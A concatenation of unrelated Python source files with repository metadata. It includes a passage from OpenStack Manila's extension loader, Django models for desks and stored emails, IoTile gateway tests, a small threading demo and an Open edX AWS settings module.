'%(exc)s.'),
{"classpath": classpath, "exc": exc})
# Now, let's consider any subdirectories we may have...
subdirs = []
for dname in dirnames:
# Skip it if it does not have __init__.py
if not os.path.exists(os.path.join(dirpath, dname,
'__init__.py')):
continue
# If it has extension(), delegate...
ext_name = ("%s%s.%s.extension" %
(package, relpkg, dname))
try:
ext = importutils.import_class(ext_name)
except ImportError:
# extension() doesn't exist on it, so we'll explore
# the directory for ourselves
subdirs.append(dname)
else:
try:
ext(ext_mgr)
except Exception as exc:
logger.warning(_LW('Failed to load extension '
'%(ext_name)s: %(exc)s.'),
{"ext_name": ext_name, "exc": exc})
# Update the list of directories we'll explore...
dirnames[:] = subdirs
def extension_authorizer(api_name, extension_name):
def authorize(context, target=None, action=None):
if target is None:
target = {'project_id': context.project_id,
'user_id': context.user_id}
if action is None:
act = '%s_extension:%s' % (api_name, extension_name)
else:
act = '%s_extension:%s:%s' % (api_name, extension_name, action)
manila.policy.enforce(context, act, target)
return authorize
def soft_extension_authorizer(api_name, extension_name):
hard_authorize = extension_authorizer(api_name, extension_name)
def authorize(context):
try:
hard_authorize(context)
return True
except exception.NotAuthorized:
return False
return authorize
|
NetApp/manila
|
manila/api/extensions.py
|
Python
|
apache-2.0
| 12,101
|
from __future__ import unicode_literals
from django.db import models
class Company(models.Model):
user = models.ForeignKey('accounts.User',
related_name='companies')
name = models.CharField(max_length=100)
def __unicode__(self):
return self.name
class Location(models.Model):
company = models.ForeignKey('Company',
related_name='locations')
city = models.CharField(max_length=200)
total_desks = models.IntegerField(verbose_name='Total desks')
reserved_desks = models.IntegerField(verbose_name='Reserved desks')
price = models.DecimalField(verbose_name='Price per desk $',
max_digits=12, decimal_places=2)
def __unicode__(self):
return '%s' % (self.city)
@property
def free_desks(self):
return self.total_desks - self.reserved_desks
class Desk(models.Model):
owner = models.OneToOneField('accounts.User', related_name='desks',
null=True)
location = models.OneToOneField(Location, related_name='desks')
rent_start_date = models.DateTimeField(null=True)
rent_end_date = models.DateTimeField(null=True)
def __unicode__(self):
return '%s' % self.location
|
dook/coworkok
|
cowork/models.py
|
Python
|
gpl-3.0
| 1,209
|
#-*- coding: utf-8 -*-
from database_email_backend.fields import Base64Field
from django.db import models
class Email(models.Model):
sent_at = models.DateTimeField(auto_now_add=True)
from_email = models.CharField(blank=True, default='', max_length=255)
to_emails = models.TextField(blank=True, default='')
cc_emails = models.TextField(blank=True, default='')
bcc_emails = models.TextField(blank=True, default='')
all_recipients = models.TextField(blank=True, default='')
headers = models.TextField(blank=True, default='')
subject = models.TextField(blank=True, default='')
body = models.TextField(blank=True, default='')
raw = models.TextField(blank=True, default='')
def __unicode__(self):
return u'Email from "%s" to "%s" sent at %s about "%s"' % (self.from_email, self.to_emails,
self.sent_at, self.subject)
@property
def attachment_count(self):
if not hasattr(self, 'attachment_count_cache'):
self.attachment_count_cache = self.attachments.count()
return self.attachment_count_cache
class Attachment(models.Model):
email = models.ForeignKey(Email, related_name='attachments')
filename = models.CharField(max_length=255, null=True, blank=True, default=None)
content = Base64Field(null=True, blank=True, default=None)
mimetype = models.CharField(max_length=255, null=True, blank=True, default=None)
|
jbinary/django-database-email-backend
|
database_email_backend/models.py
|
Python
|
mit
| 1,478
|
import pytest
import queue
from iotile_transport_awsiot.mqtt_client import OrderedAWSIOTClient
import time
pytestmark = pytest.mark.skip("This distribution needs to be updated to work with asyncio gateway")
def test_gateway(gateway, local_broker, args):
"""Make sure we can connect to the gateway by sending packets over the mqtt message broker."""
client = OrderedAWSIOTClient(args)
client.connect('hello')
local_broker.expect(5)
client.publish('devices/d--0000-0000-0000-0002/control/probe', {'type': 'command', 'operation': 'probe', 'client': 'hello'})
local_broker.wait()
# There should be 1 command message, 1 response and 1 advertisement notification per device
assert len(local_broker.messages) == 5
assert 'devices/d--0000-0000-0000-0002/devices/d--0000-0000-0000-0001/data/advertisement' in local_broker.messages
assert 'devices/d--0000-0000-0000-0002/devices/d--0000-0000-0000-0003/data/advertisement' in local_broker.messages
assert 'devices/d--0000-0000-0000-0002/devices/d--0000-0000-0000-0004/data/advertisement' in local_broker.messages
assert 'devices/d--0000-0000-0000-0002/data/status' in local_broker.messages
assert 'devices/d--0000-0000-0000-0002/control/probe' in local_broker.messages
def test_probe(gateway, hw_man, local_broker):
"""Make sure we can probe for devices."""
local_broker.expect(3)
results = hw_man.scan(wait=0.1)
assert len(results) == 3
assert results[0]['uuid'] == 1
assert results[0]['connection_string'] == 'd--0000-0000-0000-0001'
assert results[1]['uuid'] == 3
assert results[1]['connection_string'] == 'd--0000-0000-0000-0003'
assert results[2]['uuid'] == 4
assert results[2]['connection_string'] == 'd--0000-0000-0000-0004'
def test_connect(gateway, hw_man, local_broker):
"""Make sure we can connect to a device."""
hw_man.scan(wait=0.1)
hw_man.connect(1)
hw_man.disconnect()
def test_streaming(gateway, hw_man, local_broker):
"""Make sure we can receive streamed data."""
hw_man.connect(3, wait=0.1)
hw_man.enable_streaming()
reps = hw_man.wait_reports(100, timeout=1.0)
assert len(reps) == 100
def test_tracing(gateway, hw_man, local_broker):
"""Make sure we can receive tracing data."""
hw_man.connect(4, wait=0.1)
hw_man.enable_tracing()
time.sleep(0.1)
data = hw_man.dump_trace('raw')
assert data == b'Hello world, this is tracing data!'
def test_rpcs(gateway, hw_man, local_broker):
"""Make sure we can send rpcs."""
hw_man.connect(3, wait=0.1)
hw_man.controller()
def test_script(gateway, hw_man, local_broker):
"""Make sure we can send scripts."""
script = bytearray(('ab'*10000).encode('utf-8'))
progs = queue.Queue()
hw_man.connect(3, wait=0.1)
gateway.agents[0].throttle_progress = 0.0
hw_man.stream._send_highspeed(script, lambda x, y: progs.put((x,y)))
last_done = -1
last_total = None
prog_count = 0
while not progs.empty():
done, total = progs.get(block=False)
assert done <= total
assert done >= last_done
if last_total is not None:
assert total == last_total
last_done = done
last_total = total
prog_count += 1
assert prog_count > 0
dev = gateway.device_manager.adapters[0]._adapter.devices[3]
assert dev.script == script
def test_script_chunking(gateway, hw_man, local_broker):
"""Make sure we can send scripts."""
script = bytearray(('a'*1024*80).encode('utf-8'))
progs = queue.Queue()
hw_man.connect(3, wait=0.1)
gateway.agents[0].throttle_progress = 0.0
hw_man.stream._send_highspeed(script, lambda x, y: progs.put((x, y)))
last_done = -1
last_total = None
prog_count = 0
while not progs.empty():
done, total = progs.get(block=False)
assert done <= total
assert done >= last_done
if last_total is not None:
assert total == last_total
last_done = done
last_total = total
prog_count += 1
assert prog_count > 0
dev = gateway.device_manager.adapters[0]._adapter.devices[3]
assert dev.script == script
def test_script_progress_throttling(gateway, hw_man, local_broker):
"""Make sure progress updates are properly throttled."""
script = bytearray(('a'*1024*80).encode('utf-8'))
progs = []
hw_man.connect(3, wait=0.1)
gateway.agents[0].throttle_progress = 10.0
hw_man.stream._send_highspeed(script, lambda x, y: progs.append((x, y)))
dev = gateway.device_manager.adapters[0]._adapter.devices[3]
assert dev.script == script
# This should happen faster than our throttling period so we should
# get exactly 2 progress updates, on start and on finish
assert len(progs) == 2
x, y = progs[0]
assert x == 0
x, y = progs[1]
assert x == y
def test_autodisconnect(gateway, hw_man, local_broker):
"""Make sure we autodisconnect clients."""
gateway.agents[0].client_timeout = 0.1
hw_man.connect(3, wait=0.1)
assert len(gateway.agents[0]._connections) == 1
time.sleep(1.5)
assert len(gateway.agents[0]._connections) == 0
assert hw_man.stream.connection_interrupted is True
# Make sure we can reconnect automatically
hw_man.controller()
assert len(gateway.agents[0]._connections) == 1
# Let us lapse again
time.sleep(1.5)
assert len(gateway.agents[0]._connections) == 0
# Return to our disconnected state
hw_man.disconnect()
# Make sure we can connect normally again
hw_man.connect(3, wait=0.1)
|
iotile/coretools
|
transport_plugins/awsiot/test/test_agent.py
|
Python
|
gpl-3.0
| 5,635
|
import threading
import time
class ThreadSkeleton(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
print('a new thread---')
thread=ThreadSkeleton()
thread.start()
#time.sleep(2)
print ('hello,thread---')
|
hushupei/PyCode
|
thread2.py
|
Python
|
gpl-3.0
| 247
|
#coding:utf-8
'''
Timeouts超时设置
requests.get('http://github.com', timeout=2)
'''
|
qiyeboy/SpiderBook
|
ch03/3.2.3.7.py
|
Python
|
mit
| 91
|
"""
This is the default template for our main set of AWS servers. This does NOT
cover the content machines, which use content.py
Common traits:
* Use memcached, and cache-backed sessions
* Use a MySQL 5.1 database
"""
# We intentionally define lots of variables that aren't used, and
# want to import all variables from base settings files
# pylint: disable=wildcard-import, unused-wildcard-import
# Pylint gets confused by path.py instances, which report themselves as class
# objects. As a result, pylint applies the wrong regex in validating names,
# and throws spurious errors. Therefore, we disable invalid-name checking.
# pylint: disable=invalid-name
import json
from .common import *
from openedx.core.lib.logsettings import get_logger_config
import os
from path import path
from xmodule.modulestore.modulestore_settings import convert_module_store_setting_if_needed
# SERVICE_VARIANT specifies name of the variant used, which decides what JSON
# configuration files are read during startup.
SERVICE_VARIANT = os.environ.get('SERVICE_VARIANT', None)
# CONFIG_ROOT specifies the directory where the JSON configuration
# files are expected to be found. If not specified, use the project
# directory.
CONFIG_ROOT = path(os.environ.get('CONFIG_ROOT', ENV_ROOT))
# CONFIG_PREFIX specifies the prefix of the JSON configuration files,
# based on the service variant. If no variant is use, don't use a
# prefix.
CONFIG_PREFIX = SERVICE_VARIANT + "." if SERVICE_VARIANT else ""
################################ ALWAYS THE SAME ##############################
DEBUG = False
TEMPLATE_DEBUG = False
EMAIL_BACKEND = 'django_ses.SESBackend'
SESSION_ENGINE = 'django.contrib.sessions.backends.cache'
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
# IMPORTANT: With this enabled, the server must always be behind a proxy that
# strips the header HTTP_X_FORWARDED_PROTO from client requests. Otherwise,
# a user can fool our server into thinking it was an https connection.
# See
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header
# for other warnings.
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
###################################### CELERY ################################
# Don't use a connection pool, since connections are dropped by ELB.
BROKER_POOL_LIMIT = 0
BROKER_CONNECTION_TIMEOUT = 1
# For the Result Store, use the django cache named 'celery'
CELERY_RESULT_BACKEND = 'cache'
CELERY_CACHE_BACKEND = 'celery'
# When the broker is behind an ELB, use a heartbeat to refresh the
# connection and to detect if it has been dropped.
BROKER_HEARTBEAT = 10.0
BROKER_HEARTBEAT_CHECKRATE = 2
# Each worker should only fetch one message at a time
CELERYD_PREFETCH_MULTIPLIER = 1
# Skip djcelery migrations, since we don't use the database as the broker
SOUTH_MIGRATION_MODULES = {
'djcelery': 'ignore',
}
# Rename the exchange and queues for each variant
QUEUE_VARIANT = CONFIG_PREFIX.lower()
CELERY_DEFAULT_EXCHANGE = 'edx.{0}core'.format(QUEUE_VARIANT)
HIGH_PRIORITY_QUEUE = 'edx.{0}core.high'.format(QUEUE_VARIANT)
DEFAULT_PRIORITY_QUEUE = 'edx.{0}core.default'.format(QUEUE_VARIANT)
LOW_PRIORITY_QUEUE = 'edx.{0}core.low'.format(QUEUE_VARIANT)
HIGH_MEM_QUEUE = 'edx.{0}core.high_mem'.format(QUEUE_VARIANT)
CELERY_DEFAULT_QUEUE = DEFAULT_PRIORITY_QUEUE
CELERY_DEFAULT_ROUTING_KEY = DEFAULT_PRIORITY_QUEUE
CELERY_QUEUES = {
HIGH_PRIORITY_QUEUE: {},
LOW_PRIORITY_QUEUE: {},
DEFAULT_PRIORITY_QUEUE: {},
HIGH_MEM_QUEUE: {},
}
# If we're a worker on the high_mem queue, set ourselves to die after processing
# one request to avoid having memory leaks take down the worker server. This env
# var is set in /etc/init/edx-workers.conf -- this should probably be replaced
# with some celery API call to see what queue we started listening to, but I
# don't know what that call is or if it's active at this point in the code.
if os.environ.get('QUEUE') == 'high_mem':
CELERYD_MAX_TASKS_PER_CHILD = 1
########################## NON-SECURE ENV CONFIG ##############################
# Things like server locations, ports, etc.
with open(CONFIG_ROOT / CONFIG_PREFIX + "env.json") as env_file:
ENV_TOKENS = json.load(env_file)
# STATIC_ROOT specifies the directory where static files are
# collected
STATIC_ROOT_BASE = ENV_TOKENS.get('STATIC_ROOT_BASE', None)
if STATIC_ROOT_BASE:
STATIC_ROOT = path(STATIC_ROOT_BASE)
# STATIC_URL_BASE specifies the base url to use for static files
STATIC_URL_BASE = ENV_TOKENS.get('STATIC_URL_BASE', None)
if STATIC_URL_BASE:
# collectstatic will fail if STATIC_URL is a unicode string
STATIC_URL = STATIC_URL_BASE.encode('ascii')
if not STATIC_URL.endswith("/"):
STATIC_URL += "/"
# MEDIA_ROOT specifies the directory where user-uploaded files are stored.
MEDIA_ROOT = ENV_TOKENS.get('MEDIA_ROOT', MEDIA_ROOT)
MEDIA_URL = ENV_TOKENS.get('MEDIA_URL', MEDIA_URL)
PLATFORM_NAME = ENV_TOKENS.get('PLATFORM_NAME', PLATFORM_NAME)
# For displaying on the receipt. At Stanford PLATFORM_NAME != MERCHANT_NAME, but PLATFORM_NAME is a fine default
PLATFORM_TWITTER_ACCOUNT = ENV_TOKENS.get('PLATFORM_TWITTER_ACCOUNT', PLATFORM_TWITTER_ACCOUNT)
PLATFORM_FACEBOOK_ACCOUNT = ENV_TOKENS.get('PLATFORM_FACEBOOK_ACCOUNT', PLATFORM_FACEBOOK_ACCOUNT)
# Social media links for the page footer
SOCIAL_MEDIA_FOOTER_URLS = ENV_TOKENS.get('SOCIAL_MEDIA_FOOTER_URLS', SOCIAL_MEDIA_FOOTER_URLS)
CC_MERCHANT_NAME = ENV_TOKENS.get('CC_MERCHANT_NAME', PLATFORM_NAME)
EMAIL_BACKEND = ENV_TOKENS.get('EMAIL_BACKEND', EMAIL_BACKEND)
EMAIL_FILE_PATH = ENV_TOKENS.get('EMAIL_FILE_PATH', None)
EMAIL_HOST = ENV_TOKENS.get('EMAIL_HOST', 'localhost') # django default is localhost
EMAIL_PORT = ENV_TOKENS.get('EMAIL_PORT', 25) # django default is 25
EMAIL_USE_TLS = ENV_TOKENS.get('EMAIL_USE_TLS', False) # django default is False
SITE_NAME = ENV_TOKENS['SITE_NAME']
HTTPS = ENV_TOKENS.get('HTTPS', HTTPS)
SESSION_ENGINE = ENV_TOKENS.get('SESSION_ENGINE', SESSION_ENGINE)
SESSION_COOKIE_DOMAIN = ENV_TOKENS.get('SESSION_COOKIE_DOMAIN')
SESSION_COOKIE_HTTPONLY = ENV_TOKENS.get('SESSION_COOKIE_HTTPONLY', True)
REGISTRATION_EXTRA_FIELDS = ENV_TOKENS.get('REGISTRATION_EXTRA_FIELDS', REGISTRATION_EXTRA_FIELDS)
SESSION_COOKIE_SECURE = ENV_TOKENS.get('SESSION_COOKIE_SECURE', SESSION_COOKIE_SECURE)
CMS_BASE = ENV_TOKENS.get('CMS_BASE', 'studio.edx.org')
# allow for environments to specify what cookie name our login subsystem should use
# this is to fix a bug regarding simultaneous logins between edx.org and edge.edx.org which can
# happen with some browsers (e.g. Firefox)
if ENV_TOKENS.get('SESSION_COOKIE_NAME', None):
# NOTE, there's a bug in Django (http://bugs.python.org/issue18012) which necessitates this being a str()
SESSION_COOKIE_NAME = str(ENV_TOKENS.get('SESSION_COOKIE_NAME'))
BOOK_URL = ENV_TOKENS['BOOK_URL']
MEDIA_URL = ENV_TOKENS['MEDIA_URL']
LOG_DIR = ENV_TOKENS['LOG_DIR']
CACHES = ENV_TOKENS['CACHES']
# Cache used for location mapping -- called many times with the same key/value
# in a given request.
if 'loc_cache' not in CACHES:
CACHES['loc_cache'] = {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'edx_location_mem_cache',
}
# Email overrides
DEFAULT_FROM_EMAIL = ENV_TOKENS.get('DEFAULT_FROM_EMAIL', DEFAULT_FROM_EMAIL)
DEFAULT_FEEDBACK_EMAIL = ENV_TOKENS.get('DEFAULT_FEEDBACK_EMAIL', DEFAULT_FEEDBACK_EMAIL)
ADMINS = ENV_TOKENS.get('ADMINS', ADMINS)
SERVER_EMAIL = ENV_TOKENS.get('SERVER_EMAIL', SERVER_EMAIL)
TECH_SUPPORT_EMAIL = ENV_TOKENS.get('TECH_SUPPORT_EMAIL', TECH_SUPPORT_EMAIL)
CONTACT_EMAIL = ENV_TOKENS.get('CONTACT_EMAIL', CONTACT_EMAIL)
BUGS_EMAIL = ENV_TOKENS.get('BUGS_EMAIL', BUGS_EMAIL)
PAYMENT_SUPPORT_EMAIL = ENV_TOKENS.get('PAYMENT_SUPPORT_EMAIL', PAYMENT_SUPPORT_EMAIL)
FINANCE_EMAIL = ENV_TOKENS.get('FINANCE_EMAIL', FINANCE_EMAIL)
UNIVERSITY_EMAIL = ENV_TOKENS.get('UNIVERSITY_EMAIL', UNIVERSITY_EMAIL)
PRESS_EMAIL = ENV_TOKENS.get('PRESS_EMAIL', PRESS_EMAIL)
# Currency
PAID_COURSE_REGISTRATION_CURRENCY = ENV_TOKENS.get('PAID_COURSE_REGISTRATION_CURRENCY',
PAID_COURSE_REGISTRATION_CURRENCY)
# Payment Report Settings
PAYMENT_REPORT_GENERATOR_GROUP = ENV_TOKENS.get('PAYMENT_REPORT_GENERATOR_GROUP', PAYMENT_REPORT_GENERATOR_GROUP)
# Bulk Email overrides
BULK_EMAIL_DEFAULT_FROM_EMAIL = ENV_TOKENS.get('BULK_EMAIL_DEFAULT_FROM_EMAIL', BULK_EMAIL_DEFAULT_FROM_EMAIL)
BULK_EMAIL_EMAILS_PER_TASK = ENV_TOKENS.get('BULK_EMAIL_EMAILS_PER_TASK', BULK_EMAIL_EMAILS_PER_TASK)
BULK_EMAIL_DEFAULT_RETRY_DELAY = ENV_TOKENS.get('BULK_EMAIL_DEFAULT_RETRY_DELAY', BULK_EMAIL_DEFAULT_RETRY_DELAY)
BULK_EMAIL_MAX_RETRIES = ENV_TOKENS.get('BULK_EMAIL_MAX_RETRIES', BULK_EMAIL_MAX_RETRIES)
BULK_EMAIL_INFINITE_RETRY_CAP = ENV_TOKENS.get('BULK_EMAIL_INFINITE_RETRY_CAP', BULK_EMAIL_INFINITE_RETRY_CAP)
BULK_EMAIL_LOG_SENT_EMAILS = ENV_TOKENS.get('BULK_EMAIL_LOG_SENT_EMAILS', BULK_EMAIL_LOG_SENT_EMAILS)
BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS = ENV_TOKENS.get('BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS', BULK_EMAIL_RETRY_DELAY_BETWEEN_SENDS)
# We want Bulk Email running on the high-priority queue, so we define the
# routing key that points to it. At the moment, the name is the same.
# We have to reset the value here, since we have changed the value of the queue name.
BULK_EMAIL_ROUTING_KEY = HIGH_PRIORITY_QUEUE
# We can run smaller jobs on the low priority queue. See note above for why
# we have to reset the value here.
BULK_EMAIL_ROUTING_KEY_SMALL_JOBS = LOW_PRIORITY_QUEUE
# Theme overrides
THEME_NAME = ENV_TOKENS.get('THEME_NAME', None)
# Marketing link overrides
MKTG_URL_LINK_MAP.update(ENV_TOKENS.get('MKTG_URL_LINK_MAP', {}))
# Mobile store URL overrides
MOBILE_STORE_URLS = ENV_TOKENS.get('MOBILE_STORE_URLS', MOBILE_STORE_URLS)
# Timezone overrides
TIME_ZONE = ENV_TOKENS.get('TIME_ZONE', TIME_ZONE)
# Translation overrides
LANGUAGES = ENV_TOKENS.get('LANGUAGES', LANGUAGES)
LANGUAGE_DICT = dict(LANGUAGES)
LANGUAGE_CODE = ENV_TOKENS.get('LANGUAGE_CODE', LANGUAGE_CODE)
USE_I18N = ENV_TOKENS.get('USE_I18N', USE_I18N)
# Additional installed apps
for app in ENV_TOKENS.get('ADDL_INSTALLED_APPS', []):
INSTALLED_APPS += (app,)
INSTALLED_APPS += (
'social.apps.django_app.default',
'django_extensions',
)
ENV_FEATURES = ENV_TOKENS.get('FEATURES', ENV_TOKENS.get('MITX_FEATURES', {}))
for feature, value in ENV_FEATURES.items():
FEATURES[feature] = value
WIKI_ENABLED = ENV_TOKENS.get('WIKI_ENABLED', WIKI_ENABLED)
local_loglevel = ENV_TOKENS.get('LOCAL_LOGLEVEL', 'INFO')
LOGGING = get_logger_config(LOG_DIR,
logging_env=ENV_TOKENS['LOGGING_ENV'],
local_loglevel=local_loglevel,
debug=False,
service_variant=SERVICE_VARIANT)
COURSE_LISTINGS = ENV_TOKENS.get('COURSE_LISTINGS', {})
SUBDOMAIN_BRANDING = ENV_TOKENS.get('SUBDOMAIN_BRANDING', {})
VIRTUAL_UNIVERSITIES = ENV_TOKENS.get('VIRTUAL_UNIVERSITIES', [])
META_UNIVERSITIES = ENV_TOKENS.get('META_UNIVERSITIES', {})
COMMENTS_SERVICE_URL = ENV_TOKENS.get("COMMENTS_SERVICE_URL", '')
COMMENTS_SERVICE_KEY = ENV_TOKENS.get("COMMENTS_SERVICE_KEY", '')
CERT_QUEUE = ENV_TOKENS.get("CERT_QUEUE", 'test-pull')
ZENDESK_URL = ENV_TOKENS.get("ZENDESK_URL")
FEEDBACK_SUBMISSION_EMAIL = ENV_TOKENS.get("FEEDBACK_SUBMISSION_EMAIL")
MKTG_URLS = ENV_TOKENS.get('MKTG_URLS', MKTG_URLS)
# git repo loading environment
GIT_REPO_DIR = ENV_TOKENS.get('GIT_REPO_DIR', '/edx/var/edxapp/course_repos')
GIT_IMPORT_STATIC = ENV_TOKENS.get('GIT_IMPORT_STATIC', True)
for name, value in ENV_TOKENS.get("CODE_JAIL", {}).items():
oldvalue = CODE_JAIL.get(name)
if isinstance(oldvalue, dict):
for subname, subvalue in value.items():
oldvalue[subname] = subvalue
else:
CODE_JAIL[name] = value
COURSES_WITH_UNSAFE_CODE = ENV_TOKENS.get("COURSES_WITH_UNSAFE_CODE", [])
ASSET_IGNORE_REGEX = ENV_TOKENS.get('ASSET_IGNORE_REGEX', ASSET_IGNORE_REGEX)
# Event Tracking
if "TRACKING_IGNORE_URL_PATTERNS" in ENV_TOKENS:
TRACKING_IGNORE_URL_PATTERNS = ENV_TOKENS.get("TRACKING_IGNORE_URL_PATTERNS")
# SSL external authentication settings
SSL_AUTH_EMAIL_DOMAIN = ENV_TOKENS.get("SSL_AUTH_EMAIL_DOMAIN", "MIT.EDU")
SSL_AUTH_DN_FORMAT_STRING = ENV_TOKENS.get("SSL_AUTH_DN_FORMAT_STRING",
"/C=US/ST=Massachusetts/O=Massachusetts Institute of Technology/OU=Client CA v1/CN={0}/emailAddress={1}")
# Django CAS external authentication settings
CAS_EXTRA_LOGIN_PARAMS = ENV_TOKENS.get("CAS_EXTRA_LOGIN_PARAMS", None)
if FEATURES.get('AUTH_USE_CAS'):
CAS_SERVER_URL = ENV_TOKENS.get("CAS_SERVER_URL", None)
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'django_cas.backends.CASBackend',
)
INSTALLED_APPS += ('django_cas',)
MIDDLEWARE_CLASSES += ('django_cas.middleware.CASMiddleware',)
CAS_ATTRIBUTE_CALLBACK = ENV_TOKENS.get('CAS_ATTRIBUTE_CALLBACK', None)
if CAS_ATTRIBUTE_CALLBACK:
import importlib
CAS_USER_DETAILS_RESOLVER = getattr(
importlib.import_module(CAS_ATTRIBUTE_CALLBACK['module']),
CAS_ATTRIBUTE_CALLBACK['function']
)
# Video Caching. Pairing country codes with CDN URLs.
# Example: {'CN': 'http://api.xuetangx.com/edx/video?s3_url='}
VIDEO_CDN_URL = ENV_TOKENS.get('VIDEO_CDN_URL', {})
############# CORS headers for cross-domain requests #################
if FEATURES.get('ENABLE_CORS_HEADERS') or FEATURES.get('ENABLE_CROSS_DOMAIN_CSRF_COOKIE'):
CORS_ALLOW_CREDENTIALS = True
CORS_ORIGIN_WHITELIST = ENV_TOKENS.get('CORS_ORIGIN_WHITELIST', ())
CORS_ORIGIN_ALLOW_ALL = ENV_TOKENS.get('CORS_ORIGIN_ALLOW_ALL', False)
CORS_ALLOW_INSECURE = ENV_TOKENS.get('CORS_ALLOW_INSECURE', False)
# If setting a cross-domain cookie, it's really important to choose
# a name for the cookie that is DIFFERENT than the cookies used
# by each subdomain. For example, suppose the applications
# at these subdomains are configured to use the following cookie names:
#
# 1) foo.example.com --> "csrftoken"
# 2) baz.example.com --> "csrftoken"
# 3) bar.example.com --> "csrftoken"
#
# For the cross-domain version of the CSRF cookie, you need to choose
# a name DIFFERENT than "csrftoken"; otherwise, the new token configured
# for ".example.com" could conflict with the other cookies,
# non-deterministically causing 403 responses.
#
# Because of the way Django stores cookies, the cookie name MUST
# be a `str`, not unicode. Otherwise there will `TypeError`s will be raised
# when Django tries to call the unicode `translate()` method with the wrong
# number of parameters.
CROSS_DOMAIN_CSRF_COOKIE_NAME = str(ENV_TOKENS.get('CROSS_DOMAIN_CSRF_COOKIE_NAME'))
# When setting the domain for the "cross-domain" version of the CSRF
# cookie, you should choose something like: ".example.com"
# (note the leading dot), where both the referer and the host
# are subdomains of "example.com".
#
# Browser security rules require that
# the cookie domain matches the domain of the server; otherwise
# the cookie won't get set. And once the cookie gets set, the client
# needs to be on a domain that matches the cookie domain, otherwise
# the client won't be able to read the cookie.
CROSS_DOMAIN_CSRF_COOKIE_DOMAIN = ENV_TOKENS.get('CROSS_DOMAIN_CSRF_COOKIE_DOMAIN')
# Field overrides. To use the IDDE feature, add
# 'courseware.student_field_overrides.IndividualStudentOverrideProvider'.
FIELD_OVERRIDE_PROVIDERS = tuple(ENV_TOKENS.get('FIELD_OVERRIDE_PROVIDERS', []))
############################## SECURE AUTH ITEMS ###############
# Secret things: passwords, access keys, etc.
with open(CONFIG_ROOT / CONFIG_PREFIX + "auth.json") as auth_file:
AUTH_TOKENS = json.load(auth_file)
############### XBlock filesystem field config ##########
if 'DJFS' in AUTH_TOKENS and AUTH_TOKENS['DJFS'] is not None:
DJFS = AUTH_TOKENS['DJFS']
############### Module Store Items ##########
HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS = ENV_TOKENS.get('HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS', {})
############### Mixed Related(Secure/Not-Secure) Items ##########
# If Segment.io key specified, load it and enable Segment.io if the feature flag is set
SEGMENT_IO_LMS_KEY = AUTH_TOKENS.get('SEGMENT_IO_LMS_KEY')
if SEGMENT_IO_LMS_KEY:
FEATURES['SEGMENT_IO_LMS'] = ENV_TOKENS.get('SEGMENT_IO_LMS', False)
CC_PROCESSOR_NAME = AUTH_TOKENS.get('CC_PROCESSOR_NAME', CC_PROCESSOR_NAME)
CC_PROCESSOR = AUTH_TOKENS.get('CC_PROCESSOR', CC_PROCESSOR)
SECRET_KEY = AUTH_TOKENS['SECRET_KEY']
AWS_ACCESS_KEY_ID = AUTH_TOKENS["AWS_ACCESS_KEY_ID"]
if AWS_ACCESS_KEY_ID == "":
AWS_ACCESS_KEY_ID = None
AWS_SECRET_ACCESS_KEY = AUTH_TOKENS["AWS_SECRET_ACCESS_KEY"]
if AWS_SECRET_ACCESS_KEY == "":
AWS_SECRET_ACCESS_KEY = None
AWS_STORAGE_BUCKET_NAME = AUTH_TOKENS.get('AWS_STORAGE_BUCKET_NAME', 'edxuploads')
# Specific setting for the File Upload Service to store media in a bucket.
FILE_UPLOAD_STORAGE_BUCKET_NAME = ENV_TOKENS.get('FILE_UPLOAD_STORAGE_BUCKET_NAME', FILE_UPLOAD_STORAGE_BUCKET_NAME)
FILE_UPLOAD_STORAGE_PREFIX = ENV_TOKENS.get('FILE_UPLOAD_STORAGE_PREFIX', FILE_UPLOAD_STORAGE_PREFIX)
# If there is a database called 'read_replica', you can use the use_read_replica_if_available
# function in util/query.py, which is useful for very large database reads
DATABASES = AUTH_TOKENS['DATABASES']
XQUEUE_INTERFACE = AUTH_TOKENS['XQUEUE_INTERFACE']
# Get the MODULESTORE from auth.json, but if it doesn't exist,
# use the one from common.py
MODULESTORE = convert_module_store_setting_if_needed(AUTH_TOKENS.get('MODULESTORE', MODULESTORE))
CONTENTSTORE = AUTH_TOKENS.get('CONTENTSTORE', CONTENTSTORE)
DOC_STORE_CONFIG = AUTH_TOKENS.get('DOC_STORE_CONFIG', DOC_STORE_CONFIG)
MONGODB_LOG = AUTH_TOKENS.get('MONGODB_LOG', {})
OPEN_ENDED_GRADING_INTERFACE = AUTH_TOKENS.get('OPEN_ENDED_GRADING_INTERFACE',
OPEN_ENDED_GRADING_INTERFACE)
EMAIL_HOST_USER = AUTH_TOKENS.get('EMAIL_HOST_USER', '') # django default is ''
EMAIL_HOST_PASSWORD = AUTH_TOKENS.get('EMAIL_HOST_PASSWORD', '') # django default is ''
# Datadog for events!
DATADOG = AUTH_TOKENS.get("DATADOG", {})
DATADOG.update(ENV_TOKENS.get("DATADOG", {}))
# TODO: deprecated (compatibility with previous settings)
if 'DATADOG_API' in AUTH_TOKENS:
DATADOG['api_key'] = AUTH_TOKENS['DATADOG_API']
# Analytics dashboard server
ANALYTICS_SERVER_URL = ENV_TOKENS.get("ANALYTICS_SERVER_URL")
ANALYTICS_API_KEY = AUTH_TOKENS.get("ANALYTICS_API_KEY", "")
# Analytics data source
ANALYTICS_DATA_URL = ENV_TOKENS.get("ANALYTICS_DATA_URL", ANALYTICS_DATA_URL)
ANALYTICS_DATA_TOKEN = AUTH_TOKENS.get("ANALYTICS_DATA_TOKEN", ANALYTICS_DATA_TOKEN)
# Analytics Dashboard
ANALYTICS_DASHBOARD_URL = ENV_TOKENS.get("ANALYTICS_DASHBOARD_URL", ANALYTICS_DASHBOARD_URL)
ANALYTICS_DASHBOARD_NAME = ENV_TOKENS.get("ANALYTICS_DASHBOARD_NAME", PLATFORM_NAME + " Insights")
# Zendesk
ZENDESK_USER = AUTH_TOKENS.get("ZENDESK_USER")
ZENDESK_API_KEY = AUTH_TOKENS.get("ZENDESK_API_KEY")
